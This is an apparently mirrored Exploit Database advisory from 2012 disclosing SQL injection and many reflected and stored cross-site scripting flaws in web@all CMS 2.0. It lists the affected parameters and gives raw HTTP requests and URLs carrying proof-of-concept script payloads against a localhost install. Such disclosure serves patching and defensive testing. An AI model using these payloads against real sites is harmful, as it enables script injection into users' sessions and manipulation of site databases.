web@all CMS 2.0 – Multiple Vulnerabilities

• Exploit Database
• 15 阅读

• 作者： LiquidWorm
  日期： 2012-08-27
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/20857/

• web@all CMS 2.0 (_order) SQL Injection Vulnerability
  
  
  Vendor: web@all
  Product web page: http://www.webatall.org
  Affected version: 2.0
  
  Summary: web@all is a PHP content management system (CMS). If you
  know about it,you nearly can use it to do anything.
  
  Desc: The application suffers from an SQL Injection vulnerability.
  Input passed via the GET parameter '_order' is not properly sanitised
  before being returned to the user or used in SQL queries. This can be
  exploited to manipulate SQL queries by injecting arbitrary SQL code.
  
  Tested on: Microsoft Windows 7 Ultimate SP1 (EN)
   Apache 2.4.2 (Win32)
   PHP 5.4.4
   MySQL 5.5.25a
  
  
  Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
  @zeroscience
  
  
  Advisory ID: ZSL-2012-5099
  Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2012-5099.php
  
  
  21.08.2012
  
  ---
  
  
  http://localhost/webatall/sys/index.php?_key=author&_order=1[SQL ATTACK QUERY]&_text[status]=-1&_type[]=0&mod=article
  
  =============================================================================
  
  web@all CMS 2.0 Multiple Remote XSS Vulnerabilities
  
  
  Vendor: web@all
  Product web page: http://www.webatall.org
  Affected version: 2.0
  
  Summary: web@all is a PHP content management system (CMS). If you
  know about it,you nearly can use it to do anything.
  
  Desc: web@all CMS suffers from multiple stored and reflected cross-site
  scripting vulnerabilities. The issues are triggered when input passed via
  several parameters to several scripts is not properly sanitized before being
  returned to the user. This can be exploited to execute arbitrary HTML and
  script code in a user's browser session in context of an affected site.
  
  ----------------------------------------------------------------------------
  * Parameter ** Method ** Module ** Type *
  ----------------------------------------------------------------------------
  
   1. actPOSTmemberReflected
   2. security POSTmemberReflected
   3. username POSTmemberReflected
   4. id GET article Reflected
   5. modGET/POSTmemberReflected
   6. _flagGET article Reflected
   7. _text[]GET article Reflected
   8. _text[alias] GET article Reflected
   9. _text[category]GET article Reflected
  10. _text[email] GET memberReflected
  11. _text[title] GET article Reflected
  12. _text[username]GET article Reflected
  13. _text[timeadd] GET memberReflected
  14. titlePOSTarticle/cronStored
  15. descriptionPOSTcronStored
  
  ----------------------------------------------------------------------------
  
  Tested on: Microsoft Windows 7 Ultimate SP1 (EN)
   Apache 2.4.2 (Win32)
   PHP 5.4.4
   MySQL 5.5.25a
  
  
  Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
  @zeroscience
  
  
  Advisory ID: ZSL-2012-5098
  Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2012-5098.php
  
  
  21.08.2012
  
  ---
  
  
  Reflected:
  ----------
  
  
  POST /webatall/sys/action.php HTTP/1.1
  Content-Length: 154
  Content-Type: application/x-www-form-urlencoded
  Cookie: guest=A0; __WA:auth=1; auth=2834d02f4b8925b021232f297a57a5a743894a0e4a801fc31
  Host: localhost:80
  Connection: Keep-alive
  Accept-Encoding: gzip,deflate
  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
  
  act=1%3cdiv%20style%3dwidth%3aexpression%28prompt%28900164%29%29%3e&goto=%2fsys&mod=member&password=Password&security=1&submit=Sign%20in&username=Username
  
  
  POST /webatall/sys/action.php HTTP/1.1
  Content-Length: 154
  Content-Type: application/x-www-form-urlencoded
  Cookie: guest=A0; __WA:auth=1; auth=2834d02f4b8925b021232f297a57a5a743894a0e4a801fc31
  Host: localhost:80
  Connection: Keep-alive
  Accept-Encoding: gzip,deflate
  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
  
  act=signin&goto=%2fsys&mod=1%3cdiv%20style%3dwidth%3aexpression%28prompt%28920000%29%29%3e&password=Password&security=1&submit=Sign%20in&username=Username
  
  
  POST /webatall/sys/action.php HTTP/1.1
  Content-Length: 159
  Content-Type: application/x-www-form-urlencoded
  Cookie: guest=A0; __WA:auth=1; auth=2834d02f4b8925b021232f297a57a5a743894a0e4a801fc31
  Host: localhost:80
  Connection: Keep-alive
  Accept-Encoding: gzip,deflate
  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
  
  act=signin&goto=%2fsys&mod=member&password=Password&security=1%3cdiv%20style%3dwidth%3aexpression%28prompt%28964492%29%29%3e&submit=Sign%20in&username=Username
  
  
  POST /webatall/sys/action.php HTTP/1.1
  Content-Length: 147
  Content-Type: application/x-www-form-urlencoded
  Cookie: guest=A0; __WA:auth=1; auth=2834d02f4b8925b021232f297a57a5a743894a0e4a801fc31
  Host: localhost:80
  Connection: Keep-alive
  Accept-Encoding: gzip,deflate
  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
  
  act=signin&goto=%2fsys&mod=member&password=admin&security=1&submit=Sign+in&username=1%3cdiv%20style%3dwidth%3aexpression%28prompt%28913398%29%29%3e
  
  
  GET /webatall/sys/index.php?_flag=&_key=title&_order=&_text%5b%5d=&_text%5bcategory%5d=&_text%5bstatus%5d=-1&_type%5b%5d=0&id=%22%20onmouseover%3dprompt%28940245%29%20bad%3d%22&mod=article
  GET /webatall/sys/index.php?_text[timeadd]=1345564800&_type[timeadd]=2&mod=1%3cdiv%20style%3dwidth%3aexpression%28prompt%28961358%29%29%3e
  GET /webatall/sys/index.php?_flag=%22%20onmouseover%3dprompt%28916116%29%20bad%3d%22&_key=title&_order=&_text%5b%5d=&_text%5bcategory%5d=&_text%5bstatus%5d=-1&_type%5b%5d=0&id=&mod=article
  GET /webatall/sys/index.php?_flag=&_key=title&_order=&_text%5b%5d=%22%20onmouseover%3dprompt%28965775%29%20bad%3d%22&_text%5bcategory%5d=&_text%5bstatus%5d=-1&_type%5b%5d=0&id=&mod=article
  GET /webatall/sys/index.php?_text%5balias%5d=%22%20onmouseover%3dprompt%28989568%29%20bad%3d%22&_type%5balias%5d=0&mod=article
  GET /webatall/sys/index.php?_flag=&_key=title&_order=&_text%5b%5d=&_text%5bcategory%5d=%22%20onmouseover%3dprompt%28926119%29%20bad%3d%22&_text%5bstatus%5d=-1&_type%5b%5d=0&id=&mod=article
  GET /webatall/sys/index.php?_text%5bemail%5d=%22%20onmouseover%3dprompt%28999602%29%20bad%3d%22&_type%5bemail%5d=0&mod=member
  GET /webatall/sys/index.php?_text%5btitle%5d=%22%20onmouseover%3dprompt%28927731%29%20bad%3d%22&_type%5btitle%5d=0&mod=article
  GET /webatall/sys/index.php?_text%5busername%5d=%22%20onmouseover%3dprompt%28926119%29%20bad%3d%22&_type%5busername%5d=0&mod=member
  GET /webatall/sys/index.php?_text[timeadd]=%22%20onmouseover%3dprompt%28929079%29%20bad%3d%22&_type[timeadd]=2&mod=member
  
  
  
  Stored:
  -------
  
  
  POST http://localhost/webatall/sys/action.php HTTP/1.1
  
  act	sys_add
  author	test
  category_id	1
  content	test
  content_key	test
  copyright	test
  files	
  id	
  lang	
  menu	
  meta_description	test
  meta_keywords	test
  mod	article
  options	test
  status	1
  thumbs	test
  title	"><script>alert(1);</script>
  
  
  
  POST http://localhost/webatall/sys/action.php HTTP/1.1
  
  act	sys_add
  cron	delete_unpaid_transaction.php
  description	"><script>alert(2);</script>
  id	
  menu	
  mod	cron
  run_interval	
  status	1
  title	"><script>alert(3);</script>